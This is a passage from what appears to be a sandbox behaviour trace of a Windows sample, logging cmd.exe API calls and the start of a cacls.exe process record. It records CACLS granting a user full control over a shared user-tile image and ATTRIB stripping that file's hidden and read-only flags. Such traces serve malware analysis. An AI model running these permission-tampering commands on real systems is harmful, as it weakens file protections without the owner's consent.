lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0186.352] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0186.352] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0186.352] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") 
returned 8 [0186.352] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0186.352] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0186.352] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0186.352] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0186.352] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0186.352] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af798 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.352] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af798, lpFilePart=0x2af794 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af794*="Desktop") returned 0x18 [0186.352] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.352] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af514 | out: lpFindFileData=0x2af514) returned 0x410ae8 [0186.353] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0186.353] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af514 | out: lpFindFileData=0x2af514) returned 0x410ae8 [0186.353] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0186.353] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af514 | out: lpFindFileData=0x2af514) returned 0x410ae8 [0186.353] FindClose (in: hFindFile=0x410ae8 | out: hFindFile=0x410ae8) returned 1 [0186.353] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0186.353] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0186.353] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0186.353] GetEnvironmentStringsW () returned 0x410308* [0186.353] FreeEnvironmentStringsW (penv=0x410308) 
returned 1 [0186.353] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0186.354] GetConsoleOutputCP () returned 0x1b5 [0186.354] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.354] GetUserDefaultLCID () returned 0x409 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af8d8, cchData=128 | out: lpLCData="0") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af8d8, cchData=128 | out: lpLCData="0") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af8d8, cchData=128 | out: lpLCData="1") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0186.354] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0186.355] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, 
lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0186.355] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0186.355] GetConsoleTitleW (in: lpConsoleTitle=0x4009b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.356] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0186.356] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0186.356] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0186.356] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0186.356] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0186.357] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0186.357] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0186.357] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0186.357] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0186.357] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0186.357] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0186.357] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0186.360] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0186.360] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0186.360] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0186.360] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0186.360] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0186.360] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0186.360] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0186.362] GetConsoleTitleW (in: lpConsoleTitle=0x2af56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.362] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.362] _wcsicmp (_String1="CACLS", 
_String2="ERASE") returned -2 [0186.362] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.362] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.362] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.362] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.362] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.362] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.362] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.362] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.362] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.362] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.362] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.362] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.362] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.362] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.362] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.362] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.362] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.362] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.362] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.362] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.362] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.362] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.363] _wcsicmp (_String1="CACLS", 
_String2="TITLE") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.363] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.363] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.363] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.363] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.363] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.363] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.363] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0186.363] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0186.363] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0186.363] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0186.363] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0186.363] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0186.363] _wcsicmp (_String1="CACLS", 
_String2="RD") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0186.363] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0186.363] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0186.363] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0186.363] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0186.363] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0186.363] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0186.363] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0186.363] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0186.363] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0186.364] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0186.364] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0186.364] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0186.364] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0186.364] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0186.364] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0186.364] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0186.364] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0186.364] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0186.364] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0186.364] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0186.364] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0186.364] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0186.364] 
SetErrorMode (uMode=0x0) returned 0x0 [0186.364] SetErrorMode (uMode=0x1) returned 0x0 [0186.364] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x411e98, lpFilePart=0x2af08c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af08c*="Desktop") returned 0x18 [0186.364] SetErrorMode (uMode=0x0) returned 0x1 [0186.364] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.364] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.369] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.370] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.370] GetLastError () returned 0x2 [0186.370] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.371] GetLastError () returned 0x2 [0186.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x412180 [0186.371] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0186.371] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.371] GetLastError () returned 0x2 [0186.371] FindFirstFileExW (in: 
lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x412180 [0186.371] FindClose (in: hFindFile=0x412180 | out: hFindFile=0x412180) returned 1 [0186.371] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.371] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.371] GetConsoleTitleW (in: lpConsoleTitle=0x2af300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.371] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af188, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af250 | out: lpAttributeList=0x2af188, lpSize=0x2af250) returned 1 [0186.371] UpdateProcThreadAttribute (in: lpAttributeList=0x2af188, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af188, lpPreviousValue=0x0) returned 1 [0186.371] GetStartupInfoW (in: lpStartupInfo=0x2af144 | out: lpStartupInfo=0x2af144*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.372] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.373] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af1e4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account 
Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af230 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x2af230*(hProcess=0x50, hThread=0x4c, dwProcessId=0xdd0, dwThreadId=0x7f8)) returned 1 [0186.375] CloseHandle (hObject=0x4c) returned 1 [0186.375] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.375] GetEnvironmentStringsW () returned 0x410308* [0186.375] FreeEnvironmentStringsW (penv=0x410308) returned 1 [0186.375] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0186.413] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x2af124 | out: lpExitCode=0x2af124*=0x0) returned 1 [0186.413] CloseHandle (hObject=0x50) returned 1 [0186.413] _vsnwprintf (in: _Buffer=0x2af26c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af130 | out: _Buffer="00000000") returned 8 [0186.413] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.413] GetEnvironmentStringsW () returned 0x412410* [0186.413] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.413] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.413] GetEnvironmentStringsW () returned 0x412410* [0186.414] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.414] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af188 | out: lpAttributeList=0x2af188) [0186.414] GetConsoleTitleW (in: lpConsoleTitle=0x2af56c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.414] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0186.414] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0186.414] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0186.414] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.414] GetLastError () returned 0x2 [0186.414] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.415] GetLastError () returned 0x2 [0186.415] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x40e4d8 [0186.415] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0186.415] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0xffffffff [0186.415] GetLastError () returned 0x2 [0186.415] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x2aee08, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2aee08) returned 0x40e4d8 [0186.415] FindClose (in: hFindFile=0x40e4d8 | out: hFindFile=0x40e4d8) returned 1 [0186.415] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0186.415] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0186.415] GetConsoleTitleW (in: 
lpConsoleTitle=0x2af300, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0186.415] InitializeProcThreadAttributeList (in: lpAttributeList=0x2af188, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x2af250 | out: lpAttributeList=0x2af188, lpSize=0x2af250) returned 1 [0186.415] UpdateProcThreadAttribute (in: lpAttributeList=0x2af188, dwFlags=0x0, Attribute=0x60001, lpValue=0x2af248, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x2af188, lpPreviousValue=0x0) returned 1 [0186.415] GetStartupInfoW (in: lpStartupInfo=0x2af144 | out: lpStartupInfo=0x2af144*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0186.415] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0186.416] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x2af1e4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2af230 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\"", 
lpProcessInformation=0x2af230*(hProcess=0x4c, hThread=0x50, dwProcessId=0x7ac, dwThreadId=0xe24)) returned 1 [0186.425] CloseHandle (hObject=0x50) returned 1 [0186.425] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0186.425] GetEnvironmentStringsW () returned 0x412410* [0186.425] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.425] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0186.459] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x2af124 | out: lpExitCode=0x2af124*=0x0) returned 1 [0186.459] CloseHandle (hObject=0x4c) returned 1 [0186.459] _vsnwprintf (in: _Buffer=0x2af26c, _BufferCount=0x13, _Format="%08X", _ArgList=0x2af130 | out: _Buffer="00000000") returned 8 [0186.459] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0186.459] GetEnvironmentStringsW () returned 0x412410* [0186.459] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.459] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0186.459] GetEnvironmentStringsW () returned 0x412410* [0186.459] FreeEnvironmentStringsW (penv=0x412410) returned 1 [0186.459] DeleteProcThreadAttributeList (in: lpAttributeList=0x2af188 | out: lpAttributeList=0x2af188) [0186.459] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.460] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0186.460] _get_osfhandle (_FileHandle=1) returned 0x7 [0186.460] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0186.460] _get_osfhandle (_FileHandle=0) returned 0x3 [0186.460] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0186.460] SetConsoleInputExeNameW () returned 0x1 [0186.460] GetConsoleOutputCP () returned 0x1b5 [0186.460] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0186.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0186.460] exit (_Code=0) Process: id = 
"383" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16ca0" os_pid = "0xdd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "382" os_parent_pid = "0xf74" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 26744 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 26745 start_va = 0x30000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 26746 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 26747 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 26748 start_va = 0x5d0000 end_va = 0x5d8fff entry_point = 0x5d0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 26749 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 26750 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = 
